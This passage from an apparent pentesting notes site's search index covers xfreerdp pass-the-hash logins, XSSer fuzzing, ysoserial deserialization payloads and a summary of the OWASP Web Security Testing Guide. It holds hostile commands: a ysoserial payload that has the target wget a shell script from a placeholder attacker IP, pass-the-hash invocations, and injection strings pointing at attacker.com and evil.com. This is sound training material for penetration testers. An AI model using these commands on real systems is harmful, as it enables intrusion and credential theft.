        # No password indicated. When prompted for one, press Enter and see if it allows us to log in\nxfreerdp [/d:domain] /u:<username> /v:$ip\n\nxfreerdp [/d:domain] /u:<username> /p:<password> /v:$ip\n# /v:{target_IP} : Specifies the target IP of the host we would like to connect to.\n\nxfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip\n# /pth:<hash>   Pass the hash\n
        ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#troubleshoot-in-pth-attack","title":"Troubleshoot in PtH attack","text":"

        Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa with the value of 0. It can be done using the following command:

        reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n

        Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.

        ","tags":["tools","windows","rdp"]},{"location":"xsltproc/","title":"xsltproc","text":"

        xsltproc is a command line tool for applying XSLT stylesheets to XML documents.

        ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsltproc/#installation","title":"Installation","text":"

        Preinstalled in Kali. See the official site: http://xmlsoft.org/xslt/xsltproc.html

        ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsltproc/#basic-usage","title":"Basic usage","text":"
        xsltproc target.xml -o target.html\n
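
        A typical use case is converting an Nmap XML report into a readable HTML page; a minimal sketch assuming the scan was saved with -oX:

        nmap -sC -sV -oX target.xml $ip\nxsltproc target.xml -o target.html\n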
        ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsser/","title":"XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities","text":"

        A Cross Site Scripter (or XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. It contains several options for trying to bypass certain filters, as well as various special code-injection techniques. XSSer ships with more than 1,300 pre-installed XSS attack vectors and can bypass filters and exploit code on several browsers/WAFs.

        ","tags":["pentesting","web pentesting"]},{"location":"xsser/#installation","title":"Installation","text":"
        sudo apt install xsser\n
        ","tags":["pentesting","web pentesting"]},{"location":"xsser/#usage","title":"Usage","text":"

        Capture a POST request with Burp Suite and fuzz it with XSSer:

        xsser --url \"http://demo.ine.local/index.php?page=dns-lookup.php\" -p \"target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS\" --auto\n# --url: to introduce the target\n# -p: Payload (it's the body of the POST request captured with Burpsuite). Use the characters 'XSS' to indicate where you want to inject the payloads that xsser is going to fuzz.\n#--auto: Inject a list of vectors provided by XSSer.\n# In the results you will have a confirmation about that parameter being injectable, and an example of payload. Use it for launching the Final Payload (-Fp).\n\nxsser --url \"http://demo.ine.local/index.php?page=dns-lookup.php\" -p \"target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS\" --Fp \"<script>alert(1)</script>\"\n

        With this, the encoded XSS payload is generated. Now, in Burp Suite, replace the POST parameters with the final attack payload and forward the request.

        Launch the XSSer GTK interface:

        xsser --gtk\n
        ","tags":["pentesting","web pentesting"]},{"location":"ysoserial/","title":"ysoserial - A tool for Java deserialization","text":"","tags":["webpentesting","tools","deserialization","java"]},{"location":"ysoserial/#installation","title":"Installation","text":"

        Repository: https://github.com/frohoff/ysoserial

        git clone https://github.com/frohoff/ysoserial.git\n

        Requires Java 1.7+ and Maven 3.x+

        sudo apt-get install maven\n

        Since ysoserial has presented some issues with Java 21, make sure to check your version:

        java --version\n

        Check your installations:

        sudo update-alternatives --config java\n

        Results:

          Selection    Path                                         Priority   Status\n------------------------------------------------------------\n* 0            /usr/lib/jvm/java-21-openjdk-amd64/bin/java   2111      auto mode\n  1            /usr/lib/jvm/java-17-openjdk-amd64/bin/java   1711      manual mode\n  2            /usr/lib/jvm/java-21-openjdk-amd64/bin/java   2111      manual mode\n

        Install Java 11:

        sudo apt-get install openjdk-11-jdk \n

        Run again

        sudo update-alternatives --config java\n

        Select the new installation, then check the Java version again with java --version.
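
        The selection can also be made non-interactively; a minimal sketch assuming the usual Debian/Kali install path for OpenJDK 11:

        sudo update-alternatives --set java /usr/lib/jvm/java-11-openjdk-amd64/bin/java\n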

        Additional debugging: see "Java not found in update-alternatives --config java after installing Java on Linux".

        After using ysoserial, you may reconfigure your system to use the latest Java version again.

        Build the app:

        mvn clean package -DskipTests\n
        ","tags":["webpentesting","tools","deserialization","java"]},{"location":"ysoserial/#basic-usage","title":"Basic usage","text":"
        java -jar ysoserial-all.jar [payload] \"[command]\"\n
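
        For example, generating a Base64-encoded payload with a CommonsCollections gadget chain; a minimal sketch assuming the chain matches the target's classpath and using a placeholder attacker URL:

        java -jar ysoserial-all.jar CommonsCollections4 'wget http://ATTACKER-IP:8000/shell.sh -O /tmp/shell.sh' | base64 -w 0\n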

        See lab: Burpsuite Lab

        In Java versions 16 and above, you need to set a series of command-line arguments for Java to run ysoserial. Note that the --add-opens flags must come before -jar so the JVM treats them as launcher options. For example:

        java \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \\ --add-opens=java.base/java.net=ALL-UNNAMED \\ --add-opens=java.base/java.util=ALL-UNNAMED \\ -jar ysoserial-all.jar [payload] '[command]'\n
        ","tags":["webpentesting","tools","deserialization","java"]},{"location":"OWASP/","title":"OWASP Web Security Testing Guide","text":"Phase Name of phase Objectives 1 Pre\u2013Engagement Define the scope and objectives of the penetration test, including the target web application, URLs, and functionalities to be tested. Obtain proper authorization and permission from the application owner to conduct the test. Gather relevant information about the application, such as technologies used, user roles, and business-critical functionalities. 2 Information Gathering & Reconnaissance Perform passive reconnaissance to gather publicly available information about the application and its infrastructure. Enumerate subdomains, directories, and files to discover hidden or sensitive content. Use tools like \"Nmap\" to identify open ports and services running on the web server. Utilize \"Google Dorks\" to find indexed information, files, and directories on the target website. 3 Threat Modeling Analyze the application's architecture and data flow to identify potential threats and attack vectors. Build an attack surface model to understand how attackers can interact with the application. Identify potential high-risk areas and prioritize testing efforts accordingly. 4 Vulnerability Scanning Use automated web vulnerability scanners like \"Burp Suite\" or \"OWASP ZAP\" to identify common security flaws. Verify and validate the scan results manually to eliminate false positives and false negatives. 5 Manual Testing & Exploitation Perform manual testing to validate and exploit identified vulnerabilities in the application. Test for input validation issues, authentication bypass, authorization flaws, and business logic vulnerabilities. Attempt to exploit security flaws to demonstrate their impact and potential risk to the application. 6 Authentication & Authorization Testing Test the application's authentication mechanisms to identify weaknesses in password policies, session management, and account lockout procedures. Evaluate the application's access controls to ensure that unauthorized users cannot access sensitive functionalities or data. 7 Session Management Testing Evaluate the application's session management mechanisms to prevent session fixation, session hijacking, and session-related attacks. Check for session timeout settings and proper session token handling. 8 Information Disclosure Review how the application handles sensitive information such as passwords, user data, and confidential files. Test for information disclosure through error messages, server responses, or improper access controls. 9 Business Logic Testing Analyze the application's business logic to identify flaws that could lead to unauthorized access or data manipulation. Test for order-related vulnerabilities, privilege escalation, and other business logic flaws. 10 Client-Side Testing Evaluate the client-side code (HTML, JavaScript) for potential security vulnerabilities, such as DOM-based XSS. Test for insecure client-side storage and sensitive data exposure. 11 Reporting & Remediation Document and prioritize the identified security vulnerabilities and risks. Provide a detailed report to developers and stakeholders, including recommendations for remediation. Assist developers in fixing the identified security issues and retesting the application to ensure that the fixes were successful. 12 Post-Engagement Conduct a post-engagement meeting to discuss the test results with stakeholders. 
Provide security awareness training to the development team to promote secure coding practices.

        Other methodologies: PTES (http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines) is a complete penetration testing methodology that covers all aspects of security assessments, including web application testing. It provides a structured approach from pre-engagement through reporting and follow-up, making it suitable for comprehensive assessments.

        ","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#1-information-gathering","title":"1. Information Gathering","text":"1. Information Gathering ID Link to Hackinglife Link to OWASP Description 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services). 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities. 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, \\ tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand. 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage.- Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist. 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message. 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs, Network and Security: Reverse proxy, IPS, WAF","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#2-configuration-and-deploy-management-testing","title":"2. Configuration and Deploy Management Testing","text":"2. Configuration and Deploy Management Testing ID Link to Hackinglife Link to OWASP Description 2.1 WSTG-CONF-01 Test Network Infrastructure Configuration - Review the applications' configurations set across the network and validate that they are not vulnerable. - Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials. 2.2 WSTG-CONF-02.md Test Application Platform Configuration - Ensure that defaults and known files have been removed. - Review configuration and server handling (40, 50) - Validate that no debugging code or extensions are left in the production environments. 
- Review the logging mechanisms set in place for the application including Log Location, Log Storage , Log Rotation, Log Access Control, Log Review 2.3 WSTG-CONF-03.md Test File Extensions Handling for Sensitive Information - Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.). - Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc) - Validate that no system framework bypasses exist on the rules set. 2.4 WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information - Find and analyse unreferenced files that might contain sensitive information. - Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename 2.5 WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces - Identify hidden administrator interfaces and functionality. - Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080) 2.6 WSTG-CONF-06 Test HTTP Methods - Enumerate supported HTTP methods using OPTIONS. - Test for access control bypass (GET->HEAD->FOO). - Test HTTP method overriding techniques. 2.7 WSTG-CONF-07 Test HTTP Strict Transport Security - Review the HSTS header and its validity. - Identify HSTS header on Web server through HTTP response header: curl -s -D- https://domain.com/ | 2.8 WSTG-CONF-08 Test RIA Cross Domain Policy Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from. 2.9 WSTG-CONF-09 Test File Permission - Review and Identify any rogue file permissions. - Identify configuration file whose permissions are set to world-readable from the installation by default. 2.10 WSTG-CONF-10 Test for Subdomain Takeover - Enumerate all possible domains (previous and current). - Identify forgotten or misconfigured domains. 2.11 WSTG-CONF-11 Test Cloud Storage - Assess that the access control configuration for the storage services is properly in place. 2.12 WSTG-CONF-12 Testing for Content Security Policy - Review the Content-Security-Policy header or meta element to identify misconfigurations. 2.13 WSTG-CONF-13 Test Path Confusion - Make sure application paths are configured correctly.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#3-identity-management-testing","title":"3. Identity Management Testing","text":"3. Identity Management Testing ID Link to Hackinglife Link to OWASP Description 3.1 WSTG-IDNT-01 Test Role Definitions - Identify and document roles used by the application. - Attempt to switch, change, or access another role. - Review the granularity of the roles and the needs behind the permissions given. 3.2 WSTG-IDNT-02 Test User Registration Process - Verify that the identity requirements for user registration are aligned with business and security requirements. - Validate the registration process. 3.3 WSTG-IDNT-03 Test Account Provisioning Process - Verify which accounts may provision other accounts and of what type. 3.4 WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account - Review processes that pertain to user identification (e.g. registration, login, etc.). - Enumerate users where possible through response analysis. 3.5 WSTG-IDNT-05 Testing for Weak or Unenforced Username Policy - Determine whether a consistent account name structure renders the application vulnerable to account enumeration. 
- User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. - Determine whether the application's error messages permit account enumeration.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#4-authentication-testing","title":"4. Authentication Testing","text":"4. Authentication Testing ID Link to Hackinglife Link to OWASP Description 4.1 WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel N/A, This content has been merged into: WSTG-CRYP-03 4.2 WSTG-ATHN-02 Testing for Default Credentials - Determine whether the application has any User accounts with default passwords. 4.3 WSTG-ATHN-03 Testing for Weak Lock Out Mechanism - Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. - Evaluate the unlock mechanism's resistance to unauthorized account unlocking. 4.4 WSTG-ATHN-04 Testing for Bypassing Authentication Schema - Ensure that authentication is applied across all services that require it. - Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection 4.5 WSTG-ATHN-05 Testing for Vulnerable Remember Password - Validate that the generated session is managed securely and do not put the user's credentials in danger (e.g., cookie) - Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off? 4.6 WSTG-ATHN-06 Testing for Browser Cache Weaknesses - Review if the application stores sensitive information on the client-side. - Review if access can occur without authorization. - Check browser history issue by clicking \"Back\" button after logging out. - Check browser cache issue from HTTP response headers (Cache-Control: nocache) 4.7 WSTG-ATHN-07 Testing for Weak Password Policy - Determine the resistance of the application against brute Force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords. - Review whether new User accounts are created with weak or predictable passwords. 4.8 WSTG-ATHN-08 Testing for Weak Security Question Answer - Determine the complexity and how straight-forward the questions are (Weak pre-generated questions, Weak self-generated question) - Assess possible user answers and brute force capabilities. 4.9 WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities - Determine whether the password change and reset functionality allows accounts to be compromised. - Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?) - Test password change (Need old password?) 4.10 WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel - Identify alternative authentication channels. - Assess the security measures used and if any bypasses exists on the alternative channels. 4.11 WSTG-ATHN-11 Testing Multi-Factor Authentication (MFA) - Identify the type of MFA used by the application. - Determine whether the MFA implementation is robust and secure. - Attempt to bypass the MFA.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#5-authorization-testing","title":"5. Authorization Testing","text":"5. Authorization Testing ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. 
- Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser) 5.3 WSTG-ATHZ-03 Testing for Privilege Escalation - Identify injection points related to role/privilege manipulation. For example: Change some param groupid=2 to groupid=1 - Verify that it is not possible for a user to modify their privileges or roles inside the application - Fuzz or otherwise attempt to bypass security measures. 5.4 WSTG-ATHZ-04 Testing for Insecure Direct Object References - Identify points where object references may occur. - Assess the access control measures and if they're vulnerable to IDOR. For example: Force changing parameter value (?invoice=123 -> ?invoice=456) 5.5 WSTG-ATHZ-05 Testing for OAuth Weaknesses - Determine if OAuth2 implementation is vulnerable or using a deprecated or custom implementation.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#6-session-management-testing","title":"6. Session Management Testing","text":"6. Session Management Testing ID Link to Hackinglife Link to OWASP Description 6.1 WSTG-SESS-01 Testing for Session Management Schema - Gather session tokens, for the same user and for different users where possible. - Analyze and ensure that enough randomness exists to stop session forging attacks. - Modify cookies that are not signed and contain information that can be manipulated. 6.2 WSTG-SESS-02 Testing for Cookies Attributes - Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure flag, Samesite=Strict) 6.3 WSTG-SESS-03 Testing for Session Fixation - Analyze the authentication mechanism and its flow. - Force cookies and assess the impact. - Check whether the application renew the cookie after a successfully user authentication. 6.4 WSTG-SESS-04 Testing for Exposed Session Variables - Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens vulnerabilities). - Review the caching configuration. - Assess the channel and methods' security (Send sessionID with GET method ?) 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token. 6.6 WSTG-SESS-06 Testing for Logout Functionality - Assess the logout UI. - Analyze the session timeout and if the session is properly killed after logout. 6.7 WSTG-SESS-07 Testing Session Timeout - Validate that a hard session timeout exists, after the timeout has passed, all session tokens should be destroyed or be unusable. 6.8 WSTG-SESS-08 Testing for Session Puzzling - Identify all session variables. - Break the logical flow of session generation. - Check whether the application uses the same session variable for more than one purpose 6.9 WSTG-SESS-09 Testing for Session Hijacking - Identify vulnerable session cookies. - Hijack vulnerable cookies and assess the risk level. 6.10 WSTG-SESS-10 Testing JSON Web Tokens - Determine whether the JWTs expose sensitive information. - Determine whether the JWTs can be tampered with or modified.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#7-data-validation-testing","title":"7. Data Validation Testing","text":"7. 
Data Validation Testing ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any). 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any). 7.3 WSTG-INPV-03 Testing for HTTP Verb Tampering N/A, This content has been merged into: WSTG-CONF-06 7.4 WSTG-INPV-04 Testing for HTTP Parameter Pollution - Identify the backend and the parsing method used. - Assess injection points and try bypassing input filters using HPP. 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. 7.6 WSTG-INPV-06 Testing for LDAP Injection - Identify LDAP injection points: /ldapsearch?user= user=user=)(uid=))(|(uid=* pass=password - Assess the severity of the injection: 7.7 WSTG-INPV-07 Testing for XML Injection - Identify XML injection points with XML Meta Characters: ', \" , <>, , &, <![CDATA[ / ]]>, XXE, TAG - Assess the types of exploits that can be attained and their severities. 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presense of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection. 7.9 WSTG-INPV-09 Testing for XPath Injection - Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('): Username: \u2018 or \u20181\u2019 = \u20181 Password: \u2018 or \u20181\u2019 = \u20181 7.10 WSTG-INPV-10 Testing for IMAP SMTP Injection - Identify IMAP/SMTP injection points (Header, Body, Footer) with special characters (i.e.: \\, \u2018, \u201c, @, #, !, |) - Understand the data flow and deployment structure of the system. - Assess the injection impacts. 7.11 WSTG-INPV-11 Testing for Code Injection - Identify injection points where you can inject code into the application. - Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource). - Check RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page - Assess the injection severity. 7.12 WSTG-INPV-12 Testing for Command Injection - Identify and assess the command injection points with special characters (i.e.: | ; & $ > < ' !) For example: ?doc=Doc1.pdf+|+Dir c:| 7.13 WSTG-INPV-13 Testing for Format String Injection - Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application. 7.14 WSTG-INPV-14 Testing for Incubated Vulnerability - Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Injection, Blind Stored XSS, File Upload) - Understand how a recall step could occur. - Set listeners or activate the recall step if possible. 7.15 WSTG-INPV-15 Testing for HTTP Splitting Smuggling - Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable. - Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable. 7.16 WSTG-INPV-16 Testing for HTTP Incoming Requests - Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests. 
- Monitor HTTP traffic without changes of end user Browser proxy or client-side application. 7.17 WSTG-INPV-17 Testing for Host Header Injection - Assess if the Host header is being parsed dynamically in the application. - Bypass security controls that rely on the header. 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit. 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability. 7.20 WSTG-INPV-20 Testing for Mass Assignment - Identify requests that modify objects - Assess if it is possible to modify fields never intended to be modified from outside","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#8-error-handling","title":"8. Error Handling","text":"8. Error Handling ID Link to Hackinglife Link to OWASP Description 8.1 WSTG-ERRH-01 Testing for Improper Error Handling - Identify existing error output (i.e.: Random files/folders (40x) - Analyze the different output returned. 8.2 WSTG-ERRH-02 Testing for Stack Traces N/A, This content has been merged into: WSTG-ERRH-01","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#9-cryptography","title":"9. Cryptography","text":"9. Cryptography ID Link to Hackinglife Link to OWASP Description 9.1 WSTG-CRYP-01 Testing for Weak Transport Layer Security - Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE) - Review the digital certificate's cryptographic strength and validity. - Ensure that the TLS security is not bypassable and is properly implemented across the application. 9.2 WSTG-CRYP-02 Testing for Padding Oracle - Identify encrypted messages that rely on padding. - Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis. 9.3 WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels - Identify sensitive information transmitted through the various channels. - Assess the privacy and security of the channels used. - Check sensitive data during the transmission: \u2022 Information used in authentication (e.g. Credentials, PINs, Session, identifiers, Tokens, Cookies\u2026), \u2022 Information protected by laws, regulations or specific organizational, policy (e.g. Credit Cards, Customers data) 9.4 WSTG-CRYP-04 Testing for Weak Encryption - Provide a guideline for the identification weak encryption or hashing uses and implementations.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#10-business-logic-testing","title":"10. Business logic Testing","text":"10. Business logic Testing ID Link to Hackinglife Link to OWASP Description 10.1 WSTG-BUSL-01 Test Business Logic Data Validation - Identify data injection points. - Validate that all checks are occurring on the back end and can't be bypassed. - Attempt to break the format of the expected data and analyze how the application is handling it. 10.2 WSTG-BUSL-02 Test Ability to Forge Requests - Review the project documentation looking for guessable, predictable, or hidden functionality of fields. - Insert logically valid data in order to bypass normal business logic workflow. 10.3 WSTG-BUSL-03 Test Integrity Checks - Review the project documentation for components of the system that move, store, or handle data. 
- Determine what type of data is logically acceptable by the component and what types the system should guard against. - Determine who should be allowed to modify or read that data in each component. - Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow. 10.4 WSTG-BUSL-04 Test for Process Timing - Review the project documentation for system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time. - Develop and execute the mis-use cases ensuring that attackers can not gain an advantage based on any timing (Race Condition). 10.5 WSTG-BUSL-05 Test Number of Times a Function Can Be Used Limits - Identify functions that must set limits to the times they can be called. - Assess if there is a logical limit set on the functions and if it is properly validated. - For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times. 10.6 WSTG-BUSL-06 Testing for the Circumvention of Work Flows - Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow. - Develop a misuse case and try to circumvent every logic flow identified. 10.7 WSTG-BUSL-07 Test Defenses Against Application Misuse - Generate notes from all tests conducted against the system. - Review which tests had a different functionality based on aggressive input. - Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques. - Measures that might indicate the application has in-built self-defense: \u2022 Changed responses \u2022 Blocked requests \u2022 Actions that log a user out or lock their account 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcomed file types are rejected and handled safely. Also, check whether the website only check for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures. 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed. 10.10 WSTG-BUSL-10 Test Payment Functionality - Determine whether the business logic for the e-commerce functionality is robust. - Understand how the payment functionality works. - Determine whether the payment functionality is secure.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#11-client-side-testing","title":"11. Client Side Testing","text":"11. 
Client Side Testing ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type. 11.2 WSTG-CLNT-02 Testing for JavaScript Execution - Identify sinks and possible JavaScript injection points. 11.3 WSTG-CLNT-03 Testing for HTML Injection - Identify HTML injection points and assess the severity of the injected content. For example: page.html?user= 11.4 WSTG-CLNT-04 Testing for Client-side URL Redirect - Identify injection points that handle URLs or paths. - Assess the locations that the system could redirect to (Open Redirect). For example: ?redirect=www.fake-target.site 11.5 WSTG-CLNT-05 Testing for CSS Injection - Identify CSS injection points. - Assess the impact of the injection. 11.6 WSTG-CLNT-06 Testing for Client-side Resource Manipulation - Identify sinks with weak input validation. - Assess the impact of the resource manipulation. For example: www.victim.com/#http://evil.com/js.js 11.7 WSTG-CLNT-07 Testing Cross Origin Resource Sharing - Identify endpoints that implement CORS. - Ensure that the CORS configuration is secure or harmless. 11.8 WSTG-CLNT-08 Testing for Cross Site Flashing - Decompile and analyze the application's code. - Assess sinks inputs and unsafe method usages. For example: file.swf?lang=http://evil 11.9 WSTG-CLNT-09 Testing for Clickjacking - Understand security measures in place. - Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target. - Assess how strict the security measures are and if they are bypassable. 11.10 WSTG-CLNT-10 Testing WebSockets - Identify the usage of WebSockets by inspecting ws:// or wss:// URI scheme. - Assess its implementation by using the same tests on normal HTTP channels. 11.11 WSTG-CLNT-11 Testing Web Messaging - Assess the security of the message's origin. - Validate that it's using safe methods and validating its input. 11.12 WSTG-CLNT-12 Testing Browser Storage - Determine whether the website is storing sensitive data in client-side storage. - The code handling of the storage objects should be examined for possibilities of injection attacks, such as utilizing unvalidated input or vulnerable libraries. 11.13 WSTG-CLNT-13 Testing for Cross Site Script Inclusion - Locate sensitive data across the system. - Assess the leakage of sensitive data through various techniques. 11.14 WSTG-CLNT-14 Testing for Reverse Tabnabbing N/A","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#12-api-testing","title":"12. API Testing","text":"12. API Testing ID Link to Hackinglife Link to OWASP Description 12.1 WSTG-APIT-01 Testing GraphQL - Assess that a secure and production-ready configuration is deployed. - Validate all input fields against generic attacks. - Ensure that proper access controls are applied.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/WSTG-APIT-01/","title":"Testing GraphQL","text":"

        OWASP Web Security Testing Guide 4.2 > 12. API Testing > 12.1. Testing GraphQL

        ID Link to Hackinglife Link to OWASP Description 12.1 WSTG-APIT-01 Testing GraphQL - Assess that a secure and production-ready configuration is deployed. - Validate all input fields against generic attacks. - Ensure that proper access controls are applied.","tags":["web pentesting","WSTG-APIT-01"]},{"location":"OWASP/WSTG-ATHN-01/","title":"Testing for Credentials Transported over an Encrypted Channel","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.1. Testing for Credentials Transported over an Encrypted Channel

        ID Link to Hackinglife Link to OWASP Description 4.1 WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel N/A, This content has been merged into: WSTG-CRYP-03","tags":["web pentesting","WSTG-ATHN-01"]},{"location":"OWASP/WSTG-ATHN-02/","title":"Testing for Default Credentials","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.2. Testing for Default Credentials

        ID Link to Hackinglife Link to OWASP Description 4.2 WSTG-ATHN-02 Testing for Default Credentials - Determine whether the application has any User accounts with default passwords.","tags":["web pentesting","WSTG-ATHN-02"]},{"location":"OWASP/WSTG-ATHN-03/","title":"Testing for Weak Lock Out Mechanism","text":"

        OWASP Web Security Testing Guide 4.2 > 4. Authentication Testing > 4.3. Testing for Weak Lock Out Mechanism

